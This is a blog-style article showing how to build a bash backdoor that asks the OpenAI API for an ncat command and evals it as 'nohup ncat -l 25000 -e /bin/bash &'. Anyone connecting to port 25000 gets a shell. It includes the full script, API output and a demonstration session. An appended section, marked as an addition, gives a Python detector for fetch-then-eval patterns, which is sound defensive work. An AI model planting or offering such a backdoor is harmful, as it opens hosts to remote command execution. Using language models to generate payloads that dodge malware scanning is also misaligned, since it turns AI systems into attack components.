How ChatGPT can be used to hack computers.
Current security systems can detect malware by examining its code, but what if the code is generated by an AI like ChatGPT, which in turn generates code from input text? Let's see a real-life example of how this can be done. Note that this article does not intend to teach you to hack using ChatGPT but rather to inform you of new, dangerous methods of hacking. If you try this method for educational purposes, use it only on your own computer, acknowledging any potential problems that you might cause to your security.
Write the following code and save it as revchatgpt.sh.
I will not explain all the parameters, only the most important ones.
#!/bin/bash
eval "nohup $(curl https://api.openai.com/v1/completions \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer YOUR_API_KEY' \
-d '{
"model": "text-davinci-003",
"prompt": "use ncat command to create a listener in port 25000 without explaination",
"max_tokens": 1024,
"temperature": 0
}' 2>/dev/null | jq .choices[0].text | tr -d '"' | cut -c 5-) -e /bin/bash &"
- YOUR_API_KEY: The ChatGPT authorization key used by the curl command.
- prompt: “use ncat command to create a listener in port 25000 without explaination” This asks the model for an ncat command that creates a listener on port 25000, a non-privileged port.
curl output:
$ curl https://api.openai.com/v1/completions \
> -H 'Content-Type: application/json' \
> -H 'Authorization: Bearer YOUR_API_KEY' \
> -d '{
> "model": "text-davinci-003",
> "prompt": "use ncat command to create a listener in port 25000 without explaination",
> "max_tokens": 1024,
> "temperature": 0
> }' 2>/dev/null
{"id":"cmpl-6Z3KvzPJVOhoM2z3gGqkkn8HbHtKD","object":"text_completion","created":1673812325,"model":"text-davinci-003","choices":[{"text":"\n\nncat -l 25000","index":0,"logprobs":null,"finish_reason":"stop"}],"usage":{"prompt_tokens":15,"completion_tokens":8,"total_tokens":23}}
The resulting output, after being filtered by the commands
jq .choices[0].text | tr -d '"' | cut -c 5-
becomes the following command, which creates a TCP listener on port 25000:
ncat -l 25000
It is then merged with additional text to produce the following command. If executed, this command runs in the background and executes the bash shell when someone connects to port 25000 of this host.
"nohup ncat -l 25000 -e /bin/bash &"
Finally, the command is executed by the eval statement.
After execution, we can run the ss or netstat command and verify that it is listening on port 25000.
$ ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 10 0.0.0.0:25000 0.0.0.0:* users:(("ncat",pid=2244,fd=4))
LISTEN 0 10 [::]:25000 [::]:* users:(("ncat",pid=2244,fd=3))
Let's now try to connect to the host using ncat.
$ ncat 0.0.0.0 25000
ls
Downloads
a.txt
backdoor.sh
chatgpt.key
docker
go
logs
nohup.out
rexec.sh
scripts
test
hostname
nautilus
We can see that we can connect and execute commands! We have gained shell access through a script that asks ChatGPT to generate the commands we executed.
Conclusion
I am not a security expert, so I don’t have a good view of whether this is a new threat on the horizon, but can current security systems detect malware payloads that do not contain malicious code but only simple text? Will we face a new era of AI-powered threats?
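A script like revchatgpt.sh contains no malicious command text, but its structure (eval of whatever a network request returns) is still visible to static analysis. The following added example, which is not part of the original article, is a heuristic Python check for that structure; the function names, the LLM_API_HOSTS list and both sample scripts are constructed for illustration.

```python
import re

FETCHER = re.compile(r"\b(?:curl|wget)\b")
SINK = re.compile(r"(?:^|[\s|&])(eval|source|(?:ba|da|z)?sh\s+-c)\s")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
LLM_API_HOSTS = {"api.openai.com"}  # assumption: the host used on this page; extend as needed

def substitutions(text):
    """Yield (offset, body) for each $(...); parentheses inside '...' are ignored."""
    i = text.find("$(")
    while i != -1:
        depth, j, quoted = 1, i + 2, False
        while j < len(text) and depth:
            c = text[j]
            if c == "'":
                quoted = not quoted
            elif not quoted:
                depth += (c == "(") - (c == ")")
            j += 1
        yield i, text[i + 2:j - 1]
        i = text.find("$(", j)

def statement_prefix(text, offset):
    """Return the part of the current statement that precedes offset."""
    return re.split(r"(?<!\\)\n|;", text[:offset])[-1]

def scan(script):
    """Return one finding per command substitution that is fetched, then executed."""
    findings = []
    for offset, body in substitutions(script):
        sink = SINK.search(statement_prefix(script, offset))
        if sink and FETCHER.search(body):
            hosts = URL_HOST.findall(body)
            findings.append({"line": script.count("\n", 0, offset) + 1,
                             "sink": sink.group(1), "hosts": hosts,
                             "llm_api": any(h in LLM_API_HOSTS for h in hosts)})
    return findings

# Constructed samples. SUSPICIOUS mirrors the structure of the page's script,
# with the prompt replaced by a placeholder; BENIGN must produce no findings.
SUSPICIOUS = """#!/bin/bash
eval "nohup $(curl https://api.openai.com/v1/completions \\
-d '{
"prompt": "PLACEHOLDER (text only)"
}' 2>/dev/null | jq .choices[0].text) &"
"""
BENIGN = """#!/bin/bash
eval "$(ssh-agent -s)"
VERSION=$(curl -s https://example.com/version.json | jq -r .version)
"""
```

The check only covers `$(...)` substitutions; backtick substitutions and fetch-to-file-then-execute patterns need their own rules.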